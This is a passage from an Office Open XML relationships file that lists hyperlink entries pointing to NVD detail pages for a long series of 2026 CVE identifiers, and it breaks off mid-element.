Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47492" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47506" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47517" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47534" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47549" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47555" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47557" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47566" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47567" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47568" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47581" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47584" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47603" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47604" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97238" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100261" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101883" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102134" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102399" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103539" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103587" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103588" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103589" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103590" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12241" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13720" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62081" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62083" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94173" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96450" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97243" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97285" TargetMode="External" Id="rId497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97299" TargetMode="External" Id="rId498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100260" TargetMode="External" Id="rId499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100508" TargetMode="External" Id="rId500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102144" TargetMode="External" Id="rId501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103241" TargetMode="External" Id="rId502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103396" TargetMode="External" Id="rId503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103399" TargetMode="External" Id="rId504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103476" TargetMode="External" Id="rId505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103532" TargetMode="External" Id="rId506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103548" TargetMode="External" Id="rId507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86778" TargetMode="External" Id="rId508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92537" TargetMode="External" Id="rId509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92548" TargetMode="External" Id="rId510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92872" TargetMode="External" Id="rId511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93547" TargetMode="External" Id="rId512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94545" TargetMode="External" Id="rId513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94673" TargetMode="External" Id="rId514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97066" TargetMode="External" Id="rId515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97078" TargetMode="External" Id="rId516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97249" TargetMode="External" Id="rId517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97259" TargetMode="External" Id="rId518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97261" TargetMode="External" Id="rId519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97282" TargetMode="External" Id="rId520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97302" TargetMode="External" Id="rId521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102459" TargetMode="External" Id="rId522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93460" TargetMode="External" Id="rId523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93463" TargetMode="External" Id="rId524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93464" TargetMode="External" Id="rId525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100272" TargetMode="External" Id="rId526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100278" TargetMode="External" Id="rId527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102111" TargetMode="External" Id="rId528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102140" TargetMode="External" Id="rId529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97246" TargetMode="External" Id="rId530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100265" TargetMode="External" Id="rId531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92899" TargetMode="External" Id="rId532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100263" TargetMode="External" Id="rId533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102107" TargetMode="External" Id="rId534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102581" TargetMode="External" Id="rId535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47526" TargetMode="External" Id="rId536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47531" TargetMode="External" Id="rId537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47562" TargetMode="External" Id="rId538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100257" TargetMode="External" Id="rId539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100258" TargetMode="External" Id="rId540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100259" TargetMode="External" Id="rId541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100269" TargetMode="External" Id="rId542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102090" TargetMode="External" Id="rId543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102122" TargetMode="External" Id="rId544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102577" TargetMode="External" Id="rId545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102579" TargetMode="External" Id="rId546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102584" TargetMode="External" Id="rId547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102585" TargetMode="External" Id="rId548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102586" TargetMode="External" Id="rId549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103118" TargetMode="External" Id="rId550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103387" TargetMode="External" Id="rId551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103542" TargetMode="External" Id="rId552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13719" TargetMode="External" Id="rId553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88999" TargetMode="External" Id="rId554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94672" TargetMode="External" Id="rId555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97074" TargetMode="External" Id="rId556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97079" TargetMode="External" Id="rId557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97267" TargetMode="External" Id="rId558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96825" TargetMode="External" Id="rId559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102137" TargetMode="External" Id="rId560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103533" TargetMode="External" Id="rId561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103436" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101887" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100270" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102138" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100280" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100264" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100271" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102583" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102587" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27085" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102580" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102582" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103114" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103116" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103233" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103012" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103113" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103117" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76144" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103440" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103445" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103585" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103437" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103443" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103444" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103584" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103438" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103439" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100689" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101147" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101148" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101896" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101899" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103500" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19253" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51852" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51853" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51856" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51857" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51858" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51859" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51860" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51861" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51862" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51864" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51866" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51867" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51869" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51870" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51871" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51872" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80490" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81739" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81809" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId632" /><Relationship 